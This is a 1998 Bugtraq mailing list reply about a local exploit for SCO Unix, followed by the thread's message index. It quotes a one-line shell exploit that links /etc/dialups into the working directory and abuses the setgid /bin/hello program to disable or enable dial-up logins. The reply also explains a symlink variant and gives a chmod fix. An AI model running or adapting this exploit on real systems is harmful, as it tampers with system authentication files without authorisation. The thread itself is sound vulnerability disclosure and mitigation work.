Bugtraq mailing list archives
Re: Fw: Exploit for SCO.
From: john () KUWAIT NET (John W. Temples)
Date: Fri, 11 Sep 1998 16:20:48 -0700
On Thu, 10 Sep 1998, Leshka wrote:
tty=`tty`;ttyfile=`pwd`/`basename $tty` echo "Press any letter key 240 times (3 lines of text) then <CTRL>-D to disable" echo "login or just type <CTRL>-D to login enable. Sorry for the manual work." ln /etc/dialups $ttyfile;hello leshka ..$ttyfile;rm -f $ttyfile
The exploit fails if your CWD is not in the same file system as /etc. Using a symbolic rather than a hard link fixes that. The exploit can be defeated with: # chmod g-s /bin/hello -- John W. Temples, III || Providing the first public access Internet Gulfnet Kuwait || site in the Arabian Gulf region
Current thread:
- sshd exploit?, (continued)
- sshd exploit? Navindra Umanee (Sep 05)
- Re: sshd exploit? Seth David Schoen (Sep 06)
- Reading read-protected devices in *BSD Hubert Feyrer (Sep 06)
- Re: Reading read-protected devices in *BSD Todd C. Miller (Sep 06)
- Re: Reading read-protected devices in *BSD Eivind Eklund (Sep 06)
- sshd exploit? Navindra Umanee (Sep 05)
- Another way to crash HP 5M/5N printers bwoodard () CISCO COM (Sep 05)
- Windows File Share Scanner ZyklonB Zombie (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Fiji (Sep 10)
- Re: Buffer overflow in bash 1.14.7(1) Razvan Dragomirescu (Sep 10)
- Fw: Exploit for SCO. Leshka (Sep 10)
- Re: Fw: Exploit for SCO. John W. Temples (Sep 11)
- ISS Vulnerability Alert: Windows Backdoors Update X-Force (Sep 10)
- security problems with jidentd Mitchell Blank Jr (Sep 10)
- Re: security problems with jidentd Scott Fuhrman (Sep 11)
- Cisco security notice: Cisco PIX and CBAC Fragmentation attack psirt () cisco com (Sep 11)
- Re: Buffer overflow in bash 1.14.7(1) //Stany (Sep 05)